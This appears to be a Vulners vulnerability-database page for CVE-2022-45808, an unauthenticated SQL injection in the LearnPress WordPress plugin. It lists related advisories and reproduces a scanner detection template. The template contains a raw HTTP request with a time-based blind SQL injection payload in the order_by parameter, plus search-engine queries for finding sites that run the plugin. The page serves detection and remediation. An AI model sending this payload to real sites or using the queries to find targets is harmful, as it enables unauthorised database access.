Vulners
Lucene search
LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Exploit for SQL Injection in Thimpress Learnpress | 18 Aug 202315:43 | – | githubexploit |
 | CVE-2022-45808 | 23 May 202521:02 | – | circl |
 | WordPress Plugin LearnPress SQL注入漏洞 | 26 Jan 202300:00 | – | cnnvd |
 | CVE-2022-45808 | 24 Jan 202309:13 | – | cve |
 | CVE-2022-45808 WordPress LearnPress Plugin <= 4.1.7.3.2 is vulnerable to SQL Injection | 24 Jan 202309:13 | – | cvelist |
 | Update your LearnPress plugins now! | 30 Jan 202312:15 | – | malwarebytes |
 | CVE-2022-45808 | 26 Jan 202321:17 | – | nvd |
 | WordPress LearnPress Plugin <= 4.1.7.3.2 Multiple Vulnerabilities | 26 Jan 202300:00 | – | openvas |
 | WordPress LearnPress Plugin <= 4.1.7.3.2 is vulnerable to SQL Injection | 20 Jan 202300:00 | – | patchstack |
 | Sql injection | 26 Jan 202321:17 | – | prion |
10
id: CVE-2022-45808
info:
name: LearnPress Plugin < 4.2.0 - Unauthenticated Time-Based Blind SQLi
author: DhiyaneshDK
severity: critical
description: |
SQL Injection vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions.
impact: |
Unauthenticated attackers can execute time-based blind SQL injection through the order_by parameter in the LearnPress courses archive endpoint, potentially extracting sensitive database information including user credentials, course data, and student information.
remediation: |
Update LearnPress plugin to version 4.2.0 or later that properly sanitizes and parameterizes the order_by parameter.
reference:
- https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-wordpress-lms-plugin-plugin-4-1-7-3-2-sql-injection?_s_id=cve
- https://github.com/RandomRobbieBF/CVE-2022-45808
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cve-id: CVE-2022-45808
cwe-id: CWE-89
epss-score: 0.85669
epss-percentile: 0.99389
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/learnpress"
fofa-query: body="/wp-content/plugins/learnpress"
publicwww-query: /wp-content/plugins/learnpress
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,sqli,time-based-sqli,vkev,vuln
http:
- raw:
- |
POST /wp-json/lp/v1/courses/archive-course HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
c_search=X&order_by=ID AND (SELECT 1471 FROM (SELECT(SLEEP(6)))VcSO)&order=DESC&limit=10&return_type=html
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'contains_all(body, "status", "message")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502202f6211ebf94842e8a9a3d1dd9b1397482d232d9499cddafab1fe0d9a987e53a1022100c61160a1ee1771e8f72b9a375c8ac5420c2d99876730384e8220de36d497849b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8 - 9.9
EPSS0.85669
SSVC